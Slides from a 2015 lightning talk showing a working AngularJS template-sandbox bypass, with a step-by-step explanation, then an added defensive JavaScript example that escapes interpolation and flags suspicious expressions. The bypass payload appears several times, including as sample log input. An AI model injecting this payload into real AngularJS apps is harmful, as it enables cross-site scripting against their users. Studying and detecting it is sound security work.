breaking angularjs javascript sandbox
Post on 28-May-2015
Breaking AngularJS JavaScript sandbox
A lightning talk by avlidienbrunn
What is AngularJS? And where's the sandbox?
• JavaScript framework for building single page web applications.
• Mustache style templates: having <h1>{{1+2+3}}</h1> anywhere in an Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with JavaScript
• Template expression JavaScript is sandboxed: it can't reach [object Window] or the DOM
• If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular-bound HTML
Executing JS… from JS
• eval() - unavailable, under window
• document.write - unavailable, under document
• location="javascript:" - unavailable, under document
• Function("code")() - unavailable, under blacklist
• What else is there?
The bypass
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
(Screenshot: the alert(1) dialog fires.)
Why the comparator trick works, step by step: Array.prototype.sort calls its comparator with two elements, so sort(Function) builds Function("a", "alert(1)"), a fresh function; comparing that function to 1 coerces it with toString(), and once toString has been overwritten with call, the coercion runs the function instead of printing its source.
["a","alert(1)"].sort(Function);
if(compareFunction(element1, element2) == 1){ /* sort element as bigger */ }else if(… == 0){ /* sort element as same */ }else{ /* sort element as smaller */ }
if(Function("a", "alert(1)") == 1){ /* sort element as bigger */ }else if(… == 0){ /* sort element as same */ }else{ /* sort element as smaller */ }
if((function(a){alert(1)}) == 1){ /* sort element as bigger */ }else if(… == 0){ /* sort element as same */ }else{ /* sort element as smaller */ }
if((function(a){alert(1)}).toString() == 1..toString()){ /* sort element as bigger */ }else if(… == 0){ /* sort element as same */ }else{ /* sort element as smaller */ }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ /* sort element as bigger */ }else if(… == 0){ /* sort element as same */ }else{ /* sort element as smaller */ }
["a","alert(1)"].sort(toString.constructor);
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
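Added here as a defender-side example, not code from the talk or from AngularJS: the root cause named earlier is user data printed straight into Angular-bound HTML, so the fix belongs server-side before the data reaches the template, and the payload shape above is what a log reviewer should be able to spot. The function names, the escape table and the sample inputs are constructed for this example; it assumes Angular 1.x with the default {{ }} interpolation symbols, where {{ '{{' }} is the documented way to emit a literal "{{".

```javascript
// Added example (not from the talk): defensive handling of user data that a
// server renders into Angular 1.x-bound HTML. Two pieces:
//  1. neutralizeForAngular(): HTML-escape the text, then defuse every "{{" so
//     $interpolate never sees a user-controlled expression. The "{{ '{{' }}"
//     idiom is Angular 1.x's own way to emit a literal "{{" (assumes default
//     start/end symbols).
//  2. findSandboxProbes(): a log-review heuristic that flags interpolation
//     blocks reaching for constructor/prototype chains or calling sort/call/
//     apply, which is what the sort(Function) bypass needs to reach Function.
'use strict';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function neutralizeForAngular(text) {
  // Escape HTML first (stops classic markup injection), then defuse
  // interpolation: each "{{" becomes the expression {{ '{{' }} whose value is
  // the literal text "{{", so whatever follows is plain text to Angular.
  return escapeHtml(text).replace(/\{\{/g, "{{ '{{' }}");
}

// Heuristic (constructed for this example): expression bodies that walk up to
// Function via constructor/prototype, or hand a callback to sort/call/apply.
const SUSPICIOUS = /constructor|prototype|__proto__|\.call\b|\.apply\b|\.sort\s*\(/;

function findSandboxProbes(text) {
  const hits = [];
  const re = /\{\{([\s\S]*?)\}\}/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const body = m[1];
    if (SUSPICIOUS.test(body)) hits.push(body.trim());
  }
  return hits;
}

// Constructed sample "user data" values, as a log reviewer might see them.
const SAMPLE_INPUTS = [
  'hello {{1+2+3}}',
  '{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}',
  'plain text, no braces',
];

function reviewSamples(inputs = SAMPLE_INPUTS) {
  return inputs.map((s) => ({
    input: s,
    probes: findSandboxProbes(s),
    safe: neutralizeForAngular(s),
  }));
}

console.log(JSON.stringify(reviewSamples(), null, 2));
```

The arithmetic sample is not flagged, the sort(Function) payload is flagged once, and after neutralizeForAngular() the same payload yields no interpolation body at all, because its only "{{" now belongs to the literal-brace expression. Prefer ng-non-bindable or a non-Angular rendering path where possible; this is the minimal server-side defence when user text must land inside an Angular-bound region.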
The how
(Diagram slide: [image] + [image] = alert(1))
That’s all folks!
A lightning talk by avlidienbrunn